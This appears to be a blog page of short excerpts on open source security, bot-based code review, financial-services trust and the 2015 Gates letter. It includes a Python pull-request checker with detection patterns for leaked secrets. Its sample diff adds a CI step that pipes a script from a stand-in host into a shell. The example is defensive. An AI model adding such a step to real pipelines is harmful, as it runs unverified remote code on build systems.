At one point in time I worked for an organization that banned the use of open source software. They were concerned that in the event of issues “there would be no support”. At the time they believed that commercial software from companies like IBM, Oracle, Microsoft and SAP was “safer” because there was a commercial entity that stood behind the products they sold and provided support.
Now that’s changing
Most technology leadership today recognizes that proprietary software is not inherently safer than open source software. Basic metrics such as the number of disclosed vulnerabilities and the time from disclosure to patch availability suggest that open source software has an edge, at least in being patched faster. On top of that, you have the option to inspect the code yourself and to patch it yourself, options that simply do not exist with commercial, closed software. This forces a re-evaluation of how proprietary, commercial software relates to running a safe and secure business.
Ask a programmer to review 10 lines of code, they’ll make 10 suggestions. Ask them to review 1,000 lines of code and they’ll say “it looks good!”
Many people have begun integrating bots into the GitHub ecosystem for code review. For example, the folks behind the Bootstrap UI framework created a bot called Rorschach to perform sanity checks on pull requests. If a sanity check fails, it leaves a friendly, informative comment explaining the issue and how to fix it.
There is another example at BetterDiff. The idea there is that instead of humans giving cursory reviews, a round of automated review by bots (using normal, industry-standard tooling) comments on the pull request just as a reviewer would.
Pretty soon I expect to see “when tests pass, and code reviews pass, then go ahead and merge the code” bots.
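To make the bot idea concrete, here is an added example (written for this page; it is not the Bootstrap bot, not BetterDiff's code, and uses no GitHub API): a minimal pull-request sanity checker that reads a unified diff and produces reviewer-style comments, plus the "when tests pass, and code reviews pass, then merge" gate. The rule set, the `PullRequest` shape, the required check name `ci`, and the two diff samples are all constructed for the illustration. The rules are deliberately security-flavoured, since that is the class of mistake a cursory human review most often waves through: credentials in added lines, remote scripts piped into a shell, and silent edits to CI definitions.

```python
"""Minimal pull-request sanity-check bot and merge gate (constructed example)."""
import re
from dataclasses import dataclass

# Rules applied to each *added* line. Hypothetical starter set for this example:
# (what to call it, pattern, advice for the comment).
LINE_RULES = [
    ("AWS access key ID", re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
     "remove it from the commit and rotate the key"),
    ("private key material", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
     "remove it and treat the key as compromised"),
    ("hard-coded credential", re.compile(r"(?i)\b(password|passwd|secret)\s*=\s*['\"][^'\"]{4,}['\"]"),
     "load it from a secret store or environment instead"),
    ("remote script piped into a shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
     "pin a version and verify a checksum before executing"),
]
# Paths whose modification should always get a human, not just a bot.
SENSITIVE_PREFIXES = (".github/workflows/", "Dockerfile", "requirements", "package.json")


@dataclass
class PullRequest:
    number: int
    diff: str        # unified diff text, as a Git host would expose it
    checks: dict     # check name -> "success" | "failure" | "pending"
    approvals: int = 0


def added_lines(diff):
    """Yield (path, text) for every line the diff adds, tracking the current file."""
    path = None
    for line in diff.splitlines():
        if line.startswith("+++ "):
            path = line[4:]
            if path.startswith("b/"):          # strip git's b/ prefix
                path = path[2:]
        elif line.startswith("+") and not line.startswith("+++"):
            yield path, line[1:]


def sanity_check(pr):
    """Return the comments the bot would post; an empty list means the PR is clean."""
    comments = []
    flagged_paths = set()
    for path, text in added_lines(pr.diff):
        for what, pattern, advice in LINE_RULES:
            if pattern.search(text):
                comments.append(f"{path}: {what} in added line {text.strip()!r}; {advice}.")
        if path and path.startswith(SENSITIVE_PREFIXES) and path not in flagged_paths:
            flagged_paths.add(path)
            comments.append(f"{path}: build/CI definition changed; a maintainer must review this file by hand.")
    return comments


def merge_decision(pr, required_checks=("ci",), required_approvals=1):
    """'When tests pass, and code reviews pass, then merge': returns (ok, reason)."""
    problems = sanity_check(pr)
    if problems:
        return False, f"bot left {len(problems)} comment(s)"
    for name in required_checks:
        status = pr.checks.get(name, "missing")
        if status != "success":
            return False, f"check {name!r} is {status}"
    if pr.approvals < required_approvals:
        return False, f"{pr.approvals} approval(s), {required_approvals} required"
    return True, "tests and reviews passed"


# Constructed sample diffs (not from any real repository).
BAD_DIFF = """\
diff --git a/app/config.py b/app/config.py
--- a/app/config.py
+++ b/app/config.py
@@ -1,2 +1,4 @@
 DEBUG = False
+AWS_KEY = "AKIAIOSFODNN7EXAMPLE"
+password = "hunter2hunter2"
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -5,1 +5,2 @@
 steps:
+  - run: curl -s https://example.invalid/x.sh | sh
"""
GOOD_DIFF = """\
diff --git a/app/util.py b/app/util.py
--- a/app/util.py
+++ b/app/util.py
@@ -1,1 +1,2 @@
 def slug(s):
+    \"\"\"Return a URL-safe slug for s.\"\"\"
"""

BAD_PR = PullRequest(41, BAD_DIFF, {"ci": "success"}, approvals=2)
GOOD_PR = PullRequest(42, GOOD_DIFF, {"ci": "success"}, approvals=1)

if __name__ == "__main__":
    for pr in (BAD_PR, GOOD_PR):
        for c in sanity_check(pr):
            print(f"PR #{pr.number} comment: {c}")
        print(f"PR #{pr.number} merge: {merge_decision(pr)}")
```

The order matters: the sanity check runs before the check-status and approval counts are consulted, so two human approvals on `BAD_PR` still do not merge it. That is the property you want from a merge bot; a green CI run says nothing about what the change smuggles in.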
Welcome to the future.
Q: Is it secure?
A: No it is not. Security is never binary.
Q: OK, how secure is it?
A: It seems like you just asked that question.
Q: No, the first question was if it’s secure, the second question was how secure is it.
A: Well now that wasn’t even a question at all.
Financial services companies are among the most highly regulated industries in the world. They also suffer from a trust issue. Trust is a key ingredient in making a financial services business viable. Why would I ever buy insurance, banking services or invest my savings via a company that I didn’t trust?
After the sub-prime debt crisis in 2008 it became clear that the financial services industry would need to rebuild its image. Companies would need to zealously rebuild their brands to aspire to become “trusted advisors”. From an IT standpoint it is crystal clear that client and corporate data must be guarded and protected to prevent any loss as well as to minimize the potential for damage to an organization’s reputation. How do you manage the risk and yet stay innovative?
The Bill and Melinda Gates Foundation just released its annual letter. I have come to look forward to these letters because I find them incredibly inspiring. This year, instead of an annual update, they are re-baselining and taking a fifteen-year view of the future. As I read this year’s letter I was simultaneously moved, inspired and awed by the scope of their mission:
The lives of people in poor countries will improve faster in the next 15 years than at any other time in history. And their lives will improve more than anyone else’s.
- 2015 Gates Annual Letter